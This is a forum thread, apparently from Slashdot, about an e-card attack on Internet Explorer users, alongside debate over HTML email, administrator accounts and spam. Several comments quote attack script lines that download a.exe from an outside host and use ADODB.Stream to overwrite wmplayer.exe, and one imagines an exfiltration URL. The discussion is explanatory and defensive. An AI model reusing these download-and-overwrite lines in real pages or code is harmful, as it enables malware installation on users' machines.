Re:Turn off HTML viewing in your email client!

[EasyTarget]

I've been usuing The Bat (www.ritlabs.com) for about 5 years now, and it's great. No worms, no virii, no pop-ups, no crap. I view all my email as text. And they've been continuously improving the product.

Where to start.. I finally ditched the Bat! after my five years last week.. and good riddance.

The UI has not evolved, sure lots of new features get added over the years, but they all end up as hacks into an already clumsy interface.

The UI is a classic case of a few -really- good features (I do appreciate them) surrounded by poo. Auto-formating in the text is useless, NEVER paste some code and try to annotate it, turning it off leaves everything else looking ugly. Even Outlook manages to format it's messages better.

The UI displays a classic 'designed by the developers' illness. They can't see it's flaws because they're too embedded in the development. If they'd just employ a professional UI designer to re-jig it, and actually do the things suggested, then it would be a world-beater.

And you now have to upgrade ($$$) to the latest version to stay current. It's just the same as the old one, hardly any worthwhile new features. A money-spinning enforced upgrade of the most cynical sort.

If you want it's fantastic filtering systems, wonderful templates, clever widgets, superb PGP support etc.. and are prepared to put a lot of effort and patience into learning and using it, then I heartily recommend it.

If all you want to do is write emails to people, and read ones you receive, save yourself time and money by looking elsewhere.

Re:Turn off HTML viewing in your email client!

[rokzy]

yes, this is a very good idea.

one thing that pisses me off is how Thunderbird defults to writing emails in HTML.

what's the fucking point of this!? HTML email is crap and pointless and only useful for spam. why do the developers spend so much time integrating anti-spam options, then go make this idiotic contribution to the email?

but no loading of remote images is a great option.

Re:Turn off HTML viewing in your email client!

[1u3hr]

Ummm... because you're an ordinary mortal and don't have your own webspace somewhere, perhaps?
Because, in the case I case I was describing, tech support, having the image integrated into the message -- like saying "click [picture of button]" instead of "click the button that looks like Bugs Bunny on speed" or whatever is a lot more helpful?

But you aren't an "ordinary mortal". You DO have your own webspace. Y (And anyway, any 10-year-old can make a web page on their ISP or a Geocities-kind of site; it was 10 years ago that "having a webpage" required knowhow.)

Unfortunately, despite its promise, HTML email is almost invariably redundnant and ugly (referencing fonts I don't have and looking like shit) and/or spam; not to mention the massive security risks scripting opens the recipient up to as in the FA.

Re:Turn off HTML viewing in your email client!

[first.last]

But how will I see all the neat porn spam I get then????

Re:Turn off HTML viewing in your email client!

Yes, becuase the default settings on Outlook are terrible.

HTML has no place in email.

Not to mention that Outlook is a generally crappy mail client anyway with slow searching, a generally poor interface, and as I said above, terrible default settings.

I only use it becuase I'm forced to for the groupware functionality.

Re:Turn off HTML viewing in your email client!

[Endive4Ever]

When they first put in Windows for Workgroups at the company I worked for at the time, they put one of the more annoying putzes in Engineering in charge of 'the mail server' which was a wobbly install of NT Advanced Server 3.1'.

I proceeded to mail my entire c:\dos directory as attachments to one of my buddies. It just seemed like the thing to do. Boy, that took down the mail server bad.

It really got the tech mad, but he was a third stringer doing make-work for the 'vanguard' engineer who thought it was such a good idea to roll out Windows For Workgroups (in direct conflict with the IT people who had other plans of afflicting us with Novell stuff,) and I was writing the embedded code that made the company's products run. It was overall a fun time.

Re:Turn off HTML viewing in your email client!

[Spoing]

1. Ahem, turn off HTML viewing in your email client NOW.

While I don't have a problem with this (using Evolution on Linux), I had a discussion with my boss a few weeks ago and he agreed to turn off HTML viewing (if possible) and preview anything not local (to stop web bugs) if HTML could not be disabled. The trouble is after 1/2 an hour we couldn't figure out how to disable these 'features' in Outlook!

Call me an idiot ("Hi idiot!"), though tell me where in that mess of secret sauce MS hid the switch? (1/2 an hour was all I could get on this non-work issue; Google didn't save me this time round.)

Re:Turn off HTML viewing in your email client!

[zcat_NZ]

Why?

I've turned off "plugins" and "Remote Image Loading" in my mail client, and while I only ever send plain text I do have other people send me HTML mail with performance graphs, etc, which I need to see.

Re:Turn off HTML viewing in your email client!

One line would have been sufficient. It would have also saved the rest of us from your rheumy reminesces......

Re:Turn off HTML viewing in your email client!

You should have stopped using it years ago. Outlook is the major reason why there are so much virii out there in the wild.

People need to ignore the commercial hype enamating from M$

There are always going to be "click happy" bozo's out there in net land that just don't get it.

Better yet, get a Mac, Linux or any other non-M$ system. The world would be much better off.

Re:Turn off HTML viewing in your email client!

[jez9999]

Inform me when you find a decent email client for Windows, other than Outlook (Express), that allows for use of one Local Mail tree for all POP3 accounts.

Re:Turn off HTML viewing in your email client!

[MrGibbage]

I don't think it is necessary to turn off all HTML rendering, but I do think it is crucial, and absolutely necessary to turn off all script execution by outlook. I don't use lookout, er, I mean, outlook, but my wife does. How can I turn off script execution, but keep html rendering?

Re:Turn off HTML viewing in your email client!

[b-baggins]

You're car's tires are defective: Drive no faster than 35 MPH anywhere and do it now. What? Change the tires? You're an idiot. Don't drive any faster than 35 MPH and you'll be perfectly safe. What do you mean that limits the power and flexibility of your vehicle? Do you want to be safe or not? Drive no faster than 35 MPH and do it now!

Re:Turn off HTML viewing in your email client!

How do I do this in the "pine" email client?

Re:Turn off HTML viewing in your email client!

[DebianRcksLindowsLie]

Why would anyone read their e-mail in Outlook Express?

Mozilla, Evolution, Opera - there are TONS of alternatives out there!

--
Sick of people bad-mouthing Debian? Check my sig for info on how to stop them.

Re:Turn off HTML viewing in your email client!

[gcaseye6677]

Funny how its easy to turn off images in Outlook Express, but not in the full version of Outlook (the one you actually pay for). I just looked in all the menus for about 10 minutes, and it seems like there is no option to not load images or HTML in email. Somebody please prove me wrong!

Re:Turn off HTML viewing in your email client!

[PacoTaco]

HTML is off by default for untrusted senders in Outlook 2003.

Re:Turn off HTML viewing in your email client!

[YOU+LIKEWISE+FAIL+IT]

What? You think that everytime someone wants to render HTML in a pane they should have to write a parser + rendering engine + graphics handlers etc from the ground up?

This is code reuse and it is a good thing.

Re:Turn off HTML viewing in your email client!

[horza]

The Bat! is the best email client I've used, and is one of the few Shareware apps I've found worth paying for. I've forced the office here to buy a copy so I don't have to listen to them complaining about virus problems. I've no intention of paying to upgrade, the version I purchased years ago still does me fine. The one thing that justifies its purchase price on that feature alone is the 1-click backup (does everything in one go, saves your email and your settings, compresses and password protects) and 1-click restore. Fantastic.

Phillip.

Re:Turn off HTML viewing in your email client!

[ComaVN]

HTML is heaven compared to that RTF winmail.dat crap

wtf would anyone want inline attachments in their e-mail.

Re:Turn off HTML viewing in your email client!

[Eivind]

I'm genuinely curious though, what does it do that a recent version of Kmail does not ?

People have mentioned filtering. Every client under the sun does this, kmail does it very well, and very inituitive.

There was talk of gpg/pgp-integrations. Kmail has done this too for quite some time. After selecting which key to use for signing, use couldn't be simpler.

This backup-thing sounds ok. Allthough I must admit I don't quite see why each app should try to implement backup by itself, rather than having one backup-solution for your entire computer. It'd be a hassle to have to separately backup in each and every program that stores data, rather than just, as I do now, mirror $HOME daily.

What more is there to it ? In particular, what does it do that kmail doesn't ?

Re:Turn off HTML viewing in your email client!

You're too young to remember WFW, eh?

Re:Turn off HTML viewing in your email client!

[plover]

Except that turns off all formatting for every message, including the important stuff my cow-orkers are trying to send me. They include things like tables, or highlight errors in listings in bold or red or something useful. They're actually starting to put these features to real use, rather than simply make their emails as gaudy as possible.

I have installed Outclass, an Outlook plugin for running the outlook mail through POPFile. It comes with a nice "Safe View" button that displays the entire email in notepad, allowing me to do whatever I want with it without fear of triggering a spammer's web bug (or a cow-orkers stupid dancing signature line.)

For what it's worth, for me POPFile is down to about one misclassified email a month, either way. It's a very, very smart filter.

ok...

[pb]

In that case, how about this... I'll send you this e-mail, and you can go open it in Outlook, and tell me what happened...

Stay on your toes

[J.+Jacques]

This story is just more proof that people need to be proactive about their email and internet browsing habits. The biggest reason that so many people fall for this sort of crap is that they expect their computer to "Just Work", like their TV or microwave. It'd be nice if PCs DID Just Work, but unfortunately it's not the case. If more Windows users would just take the time to check out more secure browsers and email clients, and be more careful about which emails they open and attachments they download, spammers would have a much harder job. It sounds really obvious to anyone savvy enough to read Slashdot, but this really isn't something that occurs to 90% of the people who own a computer.

Re:Stay on your toes

[ggvaidya]

What can we, as Internet users, do to get the message around? I mean, sure, education, but despite computers going from being something for mathematicians to something for everybody in ten years, most of the people I know still treat computers are something that should "Just Work". Any suggestions?

(Legal question: Tarring and feathering would be out of the question for anyone who propagates worms, right? Or could we argue violation of the Right to be Left in Peace?)

Re:Stay on your toes

[wud]

they expect their computer to "Just Work",

they should get a mac

Re:Stay on your toes

[fulgan]

As much as I'd like to agree with you (and I've said the exact same thing for a long time), blaming the users and their tendancy to expect computers to "just work" isn't going to win. It's simply too remote from facts to be a valid point any more.

In fact, I now consider that the fact that a "normal" user simply cannot use a computer properly (regardless of OS and application) as a sign of failure from the technical community (and, as a programmer as well as a sysamin, I take that rather personally).

It's people like you and me that needs to change the way they see the computers. You simply can't expect everyone else to take 5 years of their life learning what a compuer and how to operate it properly in a dangerous environement. WE have to learn how to make computers both simpler and safer to use as the trade-offs chosen by the software available today clearely miss the mark on one or both account.

Re:Stay on your toes

[Technician]

I would like an OS to have protected system files kept in a Read Only Partition. It would go a long way to security. To make changes would require booting into a service mode, changing the read write status of the system partition, making changes and rebooting which resets the partition to read only if you forgot to do it. Is there anyting out there other than the Linux Knopix bootable CD's this secure?

Re:It'd be scary if I ran my PC as Administrator..

[clester]

You mean it could overwrite /usr/bin/xmms?

I hate spam

[nycsubway]

I would love to eliminate it. To me, it's a complex engineering problem to get rid of it. The problem is presented as this:

- spam is cheap to produce
- a sucker is born every day
- even if 70% of the spam sent out doesn't get to it's destination, millions of messages will still be received
- spam filters are not installed on all mail servers
- spam is CHEAP to produce (again)

Cost is what stops junkmailers from filling postoffice mailboxes. Cost is the biggest barrier to preventing spam. It costs $0.20 to send a bulk mail item through the postoffice, it can get expensive if you want to send millions of junk mails.

How can email on the internet remain free/cheap and still not allow spam to run rampant?

Re:I hate spam

[WormholeFiend]

i still get snail-mail spam in my snail-mailbox, even though it costs money to the sender.

and it's delivered by the mailman, along with my regular mail too, even though i have a "no-fliers" sticker on my box!

the postman can consider himself lucky he comes by while i'm at work, otherwise i'd shove a bayesian filter up his...

Re:I hate spam

[thelasttemptation]

Try "Return to Sender" a few times...

Re:I hate spam

[WormholeFiend]

doesnt work with grocery store and pizza fliers.

i'm tempted to start collecting my mail and leave the spam in the box til the postman has to empty the crap out himself.

Re:I hate spam

[mog]

I was under the impression that the rate of production of suckers was one per minute. Have we made headway in stemming this epidemic?

Re:I hate spam

[Technician]

To prevent the post office from having to deliver tons of undeliverable mail to a landfill, undeliverable mail has an additional cost if returned. Senders use this extra cost item to cut down on the postage even though (last time I checked) it cost 50 cents per piece of undeliverable returned junkmail. Bounced e-mail should cost the sender. It would keep the spam lists smaller and up to date. Unfortunately forged headers will keep this from being used. The cost of sending is so low, they don't care about the undeliverable's and don't care to clean up the list. They just point the bounces and Joe Job some unlucky Joe.

How can email on the internet remain free/cheap and still not allow spam to run rampant?

POP mail needs to go away. An authenticated mail delivery system is needed where bounced mails are guranteed to get back to the sender. Mail lists will have to be pared down to managable size so a mailing doesn't bury the senders inbox. (full inbox should prevent outgoing mail. Make them deal with the invalid addresses and bounces) Everybody needs to know if their mail was delivered.

Re:I hate spam

[Yaa+101]

Simple, get rid of HTML in email, then all marketing/price balance will be ruiened...
It will take a few months but if HTML is stopped for email a lot of marketeers loose their jobs...

Re:I hate spam

[jnicholson]

The cost of sending is so low, they don't care about the undeliverable's and don't care to clean up the list. They just point the bounces and Joe Job some unlucky Joe.

Ob-knitpick: What you describe is not a Joe-Job. A false sender / reply-to address in spam is standard practice. A Joe-Job is an effort to implicate an innocent party as the sender, by making the spam advertise something belonging to that innocent party, or by appearing to advantage that innocent party in some way.

Re:I hate spam

[zero_offset]

It's worse than you think. The percentage of spam that has to hit a live address for the run to be considered successful is more like a single-digit percentage. After all, the actual purchase rate from spam campaigns is a tiny fraction of one percent.

Worse yet is the number of WILLING sysadmin accomplices out there, and I'm not even talking about the ISPs that openly support spammers. I don't remember where the articles are any more, but for awhile there was a lot of talk about van-based spammers literally bribing an admin at somebody's NOC -- then just driving up and running an ethernet cable through the back door, "borrowing" a company's bandwidth for the hour or so it took to blast out a few million H3RBAL V+I+A+G+R+A spams.

That means the engineering problem must be tackled through either a total revamp of the mail system -- something everyone agrees is sorely needed, but will probably never happen because the installed base is so large, and people will inevitably bitch about the expense -- or purely at the end-user side, which is sort of like firing the military and hoping private citizens invest in privately-owned tanks, planes and ships.

noHTML for Outlook Express

[TasosF]

Quote from that article:

Conclusion

If you're still using Outlook and Internet Explorer, this is a good time to find alternatives (I suggest FireFox and Thunderbird). Crackers and spammers are getting more and more sophisticated, and are finding ways to fool even experienced and skilled computer users.

Or alternatively,

you can use an HTML disabler like noHTML for Outlook Express

Re:noHTML for Outlook Express

[IWantMoreSpamPlease]

In regards to the HTMl disabler, Outlook express 6 has an option to read everything in plain text. Solves the problem yes?

Re:noHTML for Outlook Express

[fermion]

So one receives an email saying this will disable HTML. The user, frightened by the recent news, clicks and installs it. It works great.

Even if the program contains no additional payloads, is this behavior we wish to encourage. Creating needless dangers (due to stupid default setting) that cause users to download and install unknown code?

in general?

[RoceKiller]

Do you mean at the moment, or in general?

In general, that depends. If a security hold has been found which Microsoft haven't yet fixed, then it might very well be possible.

At the moment I am not sure, but not as far as I know.

Ugly is what ugly does

[broothal]

This looks pretty ugly:

x.Open("GET", "http://adversting.co.uk/a.exe",0);

and should never have been implemented in a browser. After all, it's not a browsers task to launch files. I remember thinking this back when Windows Explorer and Internet Explorer merged into one (you can actually type URLs in your windows explorer window). <Comic book guy> Worst idea .. ever </Comic book guy>

Re:Ugly is what ugly does

What's sad is that Mozilla Firebird^H^H^H^Hfox now automatically launches certain files, just like IE. Clicking on a .doc, .xls, or .ppt file will automatically open an MS Office application. With all the problems with VB viruses it's unfortunate that Firefox makes this the default.

Re:Ugly is what ugly does

[JCMay]

What's sad is that Mozilla Firebird^H^H^H^Hfox now automatically launches certain files, just like IE. Clicking on a .doc, .xls, or .ppt file will automatically open an MS Office application. With all the problems with VB viruses it's unfortunate that Firefox makes this the default.

There's a fundamental difference between starting an external viewer to view a downloaded file, and just executing the downloaded file. It's not the browser's fault that the external viewers have scripting languages that cause security issues, is it?

There's nothing wrong with viewing something in Acrobat Reader. I appreciate that when I see articles in Word format that Firefox opens OpenOffice.org's swriter for me.

Re:Ugly is what ugly does

There's nothing wrong with viewing something in Acrobat Reader.

Acrobat can use javascript too. Check the preferences. Somebody committed could use that feature as a starting point for a virus.

Re:Ugly is what ugly does

[CTachyon]

Actually, that bit of code just downloads the malicious .EXE. It's a bit dodgy that it's allowed to do it automatically (after all, it could be asking for http://spy.malware.com/cgi-bin/report?firstname=Jo hn&lastname=Doe&underwear_type=boxers...), but it's not an instant security breach itself. The actual bug is...

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

...which overwrites Media Player with the downloaded malware using ADODB.Stream (which probably never should have been enabled as a trusted ActiveX control in the first place, and certainly shouldn't be automatically overwriting files without user intervention).

Re:Ugly is what ugly does

[zero_offset]

It's a bit dodgy that it's allowed to do it automatically (after all, it could be asking for

How is that more "dodgy" than simply navigating to spy.malware.com via script? After all, every "Slashdot Approved" browser can be scripted to do that, and your malware.com could simply navigate back to the referring page after logging John Doe's underwear preference.

Agreed, though, it's the file-writing where things go all wrong.

Re:Ugly is what ugly does

[CTachyon]

It's not navigating, it's just downloading the file (to RAM). It might sound a bit pedantic at first, but it doesn't try to render the contents, so there's no risk of e.g. exploits against the HTML render engine.

Re:Ugly is what ugly does

[zero_offset]

I know it isn't navigating. The point is that by using an accepted feature of scripting -- navigation -- you can achieve exactly the same thing, so complaining about the ability to load text from a remote source is silly. After all, loading from remote sources is what browsers DO. It's the file writing and/or execution that should be the focus of the grandparent poster's ire.

Re:It'd be scary if I ran my PC as Administrator..

[ggvaidya]

oops ... silly me ... obviously, I meant your Microsoft(R) Windows(TM) Media Player. Nope, sorry, the quick file replacement is a feature found only on Microsoft(R) systems. Us poor Linux lusers will have to use 'apt-get install' or other equally slow technique.

I saw a similar type email

[krray]

I saw a similar type email -- and after reading the article downloaded the a.exe file for review:
$ file a.exe
a.exe: MS-DOS executable (EXE), OS/2 or MS Windows

Yep, appears to be a executable type file.

Hey Microsoft -- this would a HINT for inbound type files:
$ chmod 700 a.exe

Ready to execute -- what the heck. This is a sandboxed VMWAre type machine:
$ ./a.exe
sh: ./a.exe: cannot execute binary file

Dag nabbit, what am I doing wrong? :)

Redndant, I know. Don't run as Administrator.

[gfecyk]

I've said this before and I'll say it again. Run a current version of Windows and run your programs as a regular user, not as a "power user" or as "administrator."

Then the evil e-cards can't overwrite wmplayer.exe or anythingelse.exe because regular users don't have write access to the Windows directory or the Program Files directory, where they're stored.

The same thing can happen to an idiot running Mozilla under Linux as root, or running Opera under BSD as root. Everyone here keeps missing the underlying problem because of their anti-M$ bias. Get a clue, folks. If you do stupid stuff as root you're going to break your machine no matter what OS it runs.

Re:Redndant, I know. Don't run as Administrator.

[krray]

I've said this before and I'll say it again. Run a current version of Windows and run your programs as a regular user, not as a "power user" or as "administrator."

Tell you what sparky -- YOU try that across a enterprise type installation. Actually there is ONE (1) remaining application running across any of my networks that requires Windows (2K) boxes to remain until something else is phased in: AUTOCAD.

Go ahead -- try to install and run AutoCAD (2004 release) with Architectural and Mechanical desktops loaded ... as a regular user. I'd love to see you get AEC content networked and working on a local machine as a regular user. Good luck.

Fortunately the engineering types are special. They've got TWO computers now. 90% of their work is done on CAD which is Windows right now -- the other 10% they tap the Mac for services (file processing, email, web, word, whatever).

Every other sub-system requiring Windows has been replaced (for us -- started in 2000) and I have to agree with you 100% otherwise: regular users have no reason to run anything as administrator or "root". Just can't do that in the Windows world...

Re:Redndant, I know. Don't run as Administrator.

[reuben04]

I agree with your statement, but many of the windows based line of business applications out there "require" administrative privileges to run properly, forcing users to have administrative permissions. This is also an issue that I have not seen people thinking about lately.

Re:Redndant, I know. Don't run as Administrator.

[nehril]

sure, and then your CD burner doesn't work. or your scanner doesn't scan. there are LOTS of end user programs out there that assume and require that you run with Admin priviledges.

That being said, having IE download and run executables remains risky even if you are not admin: a trojan/backdoor can just as easily run from your home directory or your own "Startup Items" folder.

the intrepid attacker can then run all manner of other exploits/social engineering once he has a local irc zombie. Of course, the sad truth is that none of this is necessary. Just send a plain zipped virus.exe and lots of people WILL run it.

Re:Redndant, I know. Don't run as Administrator.

[JTunny]

Switching between user levels on windows isn't as simple as it is on a *nix machine. The time/memory overhead switching would send me crazy.

Re:Redndant, I know. Don't run as Administrator.

[Tom]

The same thing can happen to an idiot running Mozilla under Linux as root, or running Opera under BSD as root.

True, good point.

Everyone here keeps missing the underlying problem because of their anti-M$ bias.

True as well. However, it does contribute very much that windos very much encourages this unsafe behaviour, while all Linux and *BSD systems I know go to great pains to discourage it.

Re:Redndant, I know. Don't run as Administrator.

[rbanzai]

Okay, run as a Regular User under Win XP.

Watch as your McAfee antivirus now fails to autoupdate. Find out about it when all the users at your company get the latest virus because they are three months behind the update schedule.

Wheee!

Running as a "Regular user" does not work because too much common Windows software will not run properly under anything but "admin" rights.

Re:Redndant, I know. Don't run as Administrator.

[Silburn_Luke]

When WinXP Home edition ships with an out-of-the-box install that doesn't start you off as passwordless Administrator (sorry 'Owner') with all services running and provides some way to upgrade to a properly implemented file permissioning system without requiring use of CACLS from the command line, then you will have a point. Until that day you don't.

MSoft *say* they are taking security seriously these days, but their marketing/usability reflexes are still calling the shots when tradeoffs have to be made. While that remains true there will always be too many people running Winboxen with Admin privileges for comfort.

Regards
Luke

Re:Redndant, I know. Don't run as Administrator.

[0123456]

"The same thing can happen to an idiot running Mozilla under Linux as root,"

Except:

a) as far as I'm aware, most or all Linux distributions will create you a new non-admin user account rather than logging you on as a root user by default.

b) thanks to the wonder of modern miraculous setuid technology, there's no log on as root to run the majority of programs. About the only time I log on as root on Linux is to install apps or update kernels.

c) thanks to the wonder of modern miraculous 'su' technology, you can run as root in one window while logged on as your normal user account. As far as I'm aware, that's impossible in Windows, requiring you to log out and log back on as Administrator.

Those are just three reasons why most people run as Administrator on Windows and don't on Linux.

Re:Redndant, I know. Don't run as Administrator.

[ktulu1115]

You seem to be missing the point. Browsers shouldn't allow this:

x.Open("GET", "http://adversting.co.uk/a.exe",0);
s.SaveToFile( "C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
etc...

This is the problem with IE. Running as admin/root isn't a good idea in general, you are correct, but thats not an excuse for IE's pisspoor security.

Re:Redndant, I know. Don't run as Administrator.

[just+fiddling+around]

So the solution to stupid system design is rewarding stupid system designer by buying a new version?!? No sane person would do that for a car! I am certain nobody would have bought a Pinto II because the Pinto was "supported no more and it is their fault they still drive an exploding car because the new version is all right".

Re:Redndant, I know. Don't run as Administrator.

[poot_rootbeer]

Go ahead -- try to install and run AutoCAD (2004 release) with Architectural and Mechanical desktops loaded ... as a regular user.

I haven't tried this myself, so maybe this is a dumb question, but... shouldn't the act of installing a new application be an Administrator task to begin with?

Is it the case that even if you install as Administrator, other user accounts won't be able to run the app?

Re:Redndant, I know. Don't run as Administrator.

Mcafee is pants anyway, but in my company VirusScan 4.5.1 and 7.0 (both are enterprise editions) update perfectly correctly when logged in as a limited or even guest user.

And if you find out about it 3 months later then you aren't much of a systems administrator.

Don't you ever test software before you roll it out?

Re:Redndant, I know. Don't run as Administrator.

[upside]

It's atrocious how Windows apps STILL don't get written for multiuser and low-privilege user environments.

Take for example Adobe's Photshop 7 and Pagemaker 7. These came out way after Win2K. You have to make their respective folders and registry entries world writable before they start working for normal users.

I'm not sure about the latest CS versions, but I have my doubts.

Re:Redndant, I know. Don't run as Administrator.

[seanvaandering]

Get a clue, folks. If you do stupid stuff as root you're going to break your machine no matter what OS it runs.

Sometimes its needed to be said, and I'll agree, as a linux newbie in my own right, I knew enough to know that running as root on my machine was the stupidest thing I could do. Also in Mandrake 9.2 - if you DO try to log in as root, your desktop is completely RED - a very annoying, but effective color.

I think the biggest problem is that people think that because they OWN their computer that they should immediately have full access to EVERYTHING, including the fact that i have the right to run as administrator. Now I'm not debating that you can't run as admin, I'm stating that if someone made you a pilot today and gave ya a nice DC-10 on the runway, just because someone gave you something you have no clue how to use, would you just go and run with it? The unfortunate part is that computers look and act so "easy-to-use" - that while happy user is happily clicking away on "remove spam from your e-mail - click here" windows, that the damage is already being done - and they don't even know it. Now heres the catch: when you TELL them that you should run as a regular user, they look at you like you came from another planet and say "yeah right - its my computer and I'll damn well do what i please with it!" - which is great until they start calling you up for tech support because "It runs slow", or "It doesn't work" or [fill in your worst nightmare here].

Cheers.

Re:Redndant, I know. Don't run as Administrator.

I thought Lindows ran as root by default? Okay, it's hardly the best example of Linux security, but it does happen.

Sounds familar

This or a very similar attack has been around since at least November, 2003. It make use of an exploit that is suppose to be fixed by the latest IE patach:

Cumulative Security Update for Internet Explorer (832894)

Re:Sounds familar

[prairieson]

Yep, it looks like the author of the website is describing the Naldem/Divux trojan, discovered back in November of last year. It also appears that most virus protection packages have contended with it already.

German dialer spam gangs used "e-cards", too.

[DocSnyder]

About a year ago, German email users have been spammed with similar e-cards, which claimed to need a special presentation plugin. The "plugin" actually dialed an expensive premium-rate service number. Despite thousands of victims complaining about high phone bills, it took about a year to stop this kind of fraud.

Re:German dialer spam gangs used "e-cards", too.

Art and beauty is defined by the eye of the beholder. In case you wanna know :-)

Equivalent of chmod 700 for Windows

[gfecyk]

> Hey Microsoft -- this would a HINT for inbound type files:
> $ chmod 700 a.exe

Similarly, deny Execute permssions in %temp% to regular users and even power users with NTFS permissions. Sure this isn't done by default, but it only needs to be set once.

In a corporate environment under Win2K or XP, you can deny Execute permissions for the entire Documents and Settings folder, where each user's %temp% is stored, and also for %systemroot%\temp if you actually still run 16-bit programs.

Re:Equivalent of chmod 700 for Windows

[greed]

Are you really sure it only needs to be done once?

My experience with WindowsUpdate is that some of my paranoid settings are reset after each patch. So if you patch, you may get to do it more than once. And you'll never know when....

Re:Equivalent of chmod 700 for Windows

[gfecyk]

> My experience with WindowsUpdate is that some
> of my paranoid settings are reset after each
> patch.

Fair question. I've not known of a patch or Service Pack that reset NTFS permissions on existing files, except for the IIS Lockdown Tool which is doing what it was designed to do.

I know Win2K SP3 and SP4 insist on re-enabling Automatic Updates.

Also, I tend to do a lot of things before the fact that avoid needing to patch every day or even every month. Such as using a good firewall (Hey I use Linux 2.4! On Snapgear equipment!) and using e-mail software that refuses to open executable attachments. Period. Enforced by a system or group policy.

Of course users can't install patches without Admin privilege, so no worries about a patch getting in under my nose.

Homeland Security

WeatherBug is proud to be a part of the AWS Homeland Security Initiative.

Using Mozilla on Windows won't protect you ...

wscript.exe can apparently be launched through Mozilla. Wscript.exe scripts can execute almost anything.

I had FILEMON running (it monitors all disk i/o) and I navigated Mozilla to http://search.microsoft.com/ and entered a query in the second search textbox. Wscript.exe was fired up and it showed in FILEMON.

My solution: I renamed wscript.exe and cscript.exe so they can't execute.

Re:Using Mozilla on Windows won't protect you ...

Wscript is the default app for .js and .vbs files. All you have to do is change the launching program. You could set them to open with notepad instead. Here's a batch file, save it with a .bat extension:

ftype JSFile=%SystemRoot%\notepad.exe "%1"
ftype VBSFile=%SystemRoot%\notepad.exe "%1"

Re:Using Mozilla on Windows won't protect you ...

[brauwerman]

How does one find the mapping from extension to filetype.
You mention .js -> JSFile and .vbs->VBSFile, but suppose I want a .sh file to open in notepad?

These don't work:

ftype sh=%SystemRoot%\notepad.exe "%1"
ftype SHFile=%SystemRoot%\notepad.exe "%1"

Any idea?

Thanks,
Mike

Re:Using Mozilla on Windows won't protect you ...

Create a new file association with the assoc command. Such as

assoc .sh=SHFile

Then assign a command line to the newly created filetype

ftype SHFile=%SystemRoot%\notepad.exe "%1"

Re:Using Mozilla on Windows won't protect you ...

It's probably a good idea to use two percent signs instead of one, if you put the commands in a batch file. The DOS window needs to have the % sign escaped, otherwise it'll interpret %1 as a command line argument.

Re:Using Mozilla on Windows won't protect you ...

[brauwerman]

Thank you!

Cross-platform kornshell scripts, no longer a dream!

Amazing, really

[mao+che+minh]

It still amazes me that people (the average user, I should say) can not grasp the reality of the Internet: your system, in the safe confines of your home, is connected to a network of billions. Anyone capable of reaching the Internet can reach your system. The world is full of villians.

And yet a person that has been surfing the web and using email for the past 6 or 7 years is still shocked when they click on Britney's Web Cam XXX HOT Pics and end up with a phone bill of $500 for dialing the Hot Russian Wives Club.

Re:Amazing, really

[Secrity]

I have finally stopped feeling sorry for the lusers that won't listen to advice on how not to get burned. It used to be that folks who got viruses, had their computer dial expensive phone numbers, had disgusting pictures display on their screen could claim that the Internet is all new to them and they could claim ignorance. Things have changed, if people don't know by now that the Internet is a dangerous place and how to protect themselves, then they are just plain stupid. Some people blame the bad guys and Microsoft for people doing really stupid things on the Internet, the problem is with lusers that don't listen when they are told how to prvent this shit. Maybe a license isn't such a bad idea.

How Turn off HTML in Mozilla e-mail client?

I can't find a way.

Re:How Turn off HTML in Mozilla e-mail client?

[ortholattice]

I can't find a way.

View -> Message Body As -> Plain Text

Re:How Turn off HTML in Mozilla e-mail client?

View -> Message Body As -> Plain Text

Well, that certainly is easier than editing the registry like you need to do for IE: http://support.microsoft.com/default.aspx?scid=kb; EN-US;307594

And the nice thing is that it's right on the main menu, so you don't have to change your prefs for the odd page you really do want to view in HTML.

Re:Redundant, I know. Don't run as Administrator.

[ExistentialFeline]

Unfortunately, Windows isn't precisely the same because its very easy in Linux to set user permissions and much more of a pain in the butt in Windows (if it's even possible in some cases.)

If you use Outlook for your mail..

[JasonUCF]

You need SpamBayes. The beautiful folks behind it have included an Outlook plugin. Now you can knock your bayesian filter self out with a self contained easily run end-client solution. In smaller words, no need for anything fancy from your ISP, just install, plug, and play. In the few days I have used it my spam has literally dropped to 0. Spams are nailed before I even see them show up in the INBOX (it's that fast).

Go check it out. It's really, really, good, and free, as in, well, um, beer?

I have spent too many hours building elaborate rule sets, banning Class A IP's, keyword filters, etcetera. The spam still gets through and it carries nasty payload half the time. Bayesian...bayesian... bayesian...

Re:If you use Outlook for your mail..

[pileated]

I completely agree. My spam has gone to 0-1%. The vast majority of it is correctly placed in Junk-Email or Junk-Suspects folders by SpamBayes.

And it does force some responsibility on the user in terms of setting it up. That's what makes it work so well.

Of course if you work at a place where people have nothing better to do than open e-cards then no filtering, outside of paycheck deductions, will have much effect.

I got one yesterday

[swb]

Was the e-card itself (as viewed at the web site 123greetings.com) a problem, or was it the message itself the problem?

I get those stupid e-cards from relatives occasionally, and I never open the messages in anything but pine because they're usually loaded with crap I don't want to run.

In this case, I viewed the email in pine, copied the ecard number and viewed the stupid thing on the web site, presuming it would be from my brother (an AOL lifer), since it was my anniversary. It was unattributed on the site, so I figured it was just a spam/traffic generator.

Re:I got one yesterday

[BiggerIsBetter]

I got one too. It said it was *from* me, to some chick I've never known in my life. Someone's desparate for clicks...

"Sparky" does this on clients' Enterprises.

[gfecyk]

> Tell you what sparky -- YOU try that across
> a enterprise type installation.

Done. Twice.

I'm an IT consultant, a professional. I practice what I preach and I test things. I bounce applications that don't work with MY security standards. And I'm paid well for it.

I've massaged very broken applications into a secured environment. I'm talking about really broken, designed-for-16-bit-windows applications. I've never worked with recent versions of AutoCAD but, after at least ten years of developing for 32-bit Windows, and with Win2K being four years old, Autodesk has no excuse.

Re:"Sparky" does this on clients' Enterprises.

[pavera]

There are lots of things in windows that require admin access, MS office 97 requires it, AutoCAD does as well, you can't fix these problems without a source license, if you install them, users must have admin rights on their machines to run them.

overwrites wmplayer.exe??

[p4ul13]

Well ok; so it's not ALL bad then.

Re:overwrites wmplayer.exe??

[cavac]

Could be better. It could change the registry so it is the ONLY program started on windows startup (make especially sense on NT, 2K and XP where it would also disable the login script and therefore all that nasty desktop thingy that prohibits many users from getting their REAL work done anyway :-)

Re:e-cards

How do e-card services make money?
The less moral ones sell the email addresses they hervest from every ecard- both sender and destination.

To prove this, get 2 fresh email addresses. send an ecard from one to the other. Watch the spam roll in.

Re:e-cards

[ggvaidya]

yeah, and it's one of those "little things" you can do for someone, isn't it? Just a post to say you care, that sort of thing.

